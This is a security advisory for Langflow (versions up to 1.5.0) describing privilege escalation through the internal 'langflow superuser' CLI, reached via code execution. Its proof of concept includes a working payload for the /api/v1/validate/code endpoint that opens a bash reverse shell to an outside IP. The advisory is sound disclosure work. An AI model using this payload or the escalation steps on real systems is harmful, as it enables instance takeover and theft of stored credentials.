GHSA-4gv9-mp8m-592r
Suggest an improvement- Source
- https://github.com/advisories/GHSA-4gv9-mp8m-592r
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/08/GHSA-4gv9-mp8m-592r/GHSA-4gv9-mp8m-592r.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-4gv9-mp8m-592r
- Aliases
- Published
- 2025-08-25T16:21:04Z
- Modified
- 2025-08-25T16:44:56.332598Z
- Severity
-
- 8.8 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVSS Calculator
- Summary
- Langflow Vulnerable to Privilege Escalation via CLI Superuser Creation (Post-RCE)
- Details
-
This vulnerability was discovered by researchers at Check Point. We are sharing this report as part of a responsible disclosure process and are happy to assist in validation and remediation if needed.
Summary
A privilege escalation vulnerability exists in Langflow containers where an authenticated user with RCE access can invoke the internal CLI command langflow superuser to create a new administrative user. This results in full superuser access, even if the user initially registered through the UI as a regular (non-admin) account.
Details
Langflow's Docker image includes a CLI binary at /app/.venv/bin/langflow that exposes sensitive commands, including:
langflow superuserThis command allows creation of a new superuser without checking whether one already exists.
When combined with code execution (e.g., via the authenticated /api/v1/validate/code endpoint), a low-privileged user can execute:
/app/.venv/bin/langflow superuserinside the container, and elevate themselves to full superuser privileges.
This effectively bypasses frontend role enforcement and backend user integrity, leading to full compromise of the Langflow application.
PoC
- Start container with LANGFLOWENABLEAUTH set to True.
- Visit http://localhost:7860 and sign up. (Your user will not be marked is_superuser.)
<img width="1311" height="627" alt="image" src="https://github.com/user-attachments/assets/9b75bdc3-31ea-48c0-9e84-c2b168f404b3" />
- Exploit /api/v1/validate/code to get reverse shell
Send an authenticated POST request:
{ "code": "def foo(p=__import__('os').system(\"bash -c 'bash -i >& /dev/tcp/192.168.1.22/4444 0>&1'\")):\n pass" }- Inside reverse shell, create superuser:
<img width="731" height="217" alt="image" src="https://github.com/user-attachments/assets/cb8497c6-0d61-414e-afe2-69bbbaf55cbc" />
- Log into UI as new superuser:
<img width="1262" height="532" alt="image" src="https://github.com/user-attachments/assets/1f0a713d-3d61-4aa4-a25b-58f4b58c061b" />
Impact
- Privilege escalation to superuser — complete takeover of the Langflow instance
- Access to all user data, flows, stored credentials, and configuration
- Credential leakage — attacker can extract third-party API keys
- Exposure of environment variables (inside docker container)
- Ability to run additional Langflow instances via
langflow runinside the container, which may lead to resource exhaustion (CPU, memory) and service degradation. - Full user management — superuser can delete other users, reset their passwords
- Database specific
{ "severity": "HIGH", "github_reviewed_at": "2025-08-25T16:21:04Z", "nvd_published_at": null, "cwe_ids": [ "CWE-269" ], "github_reviewed": true }- References
Affected packages
PyPI / langflow
Package
- Name
- langflow
- View open source insights on deps.dev
- Purl
- pkg:pypi/langflow
Affected ranges
- Type
- ECOSYSTEM
- Events
-
Introduced0Unknown introduced version / All previous versions are affectedLast affected1.5.0
Affected versions
0.*
1.*
PyPI / langflow-base
Package
- Name
- langflow-base
- View open source insights on deps.dev
- Purl
- pkg:pypi/langflow-base
Affected ranges
- Type
- ECOSYSTEM
- Events
-
Introduced0Unknown introduced version / All previous versions are affectedLast affected1.5.0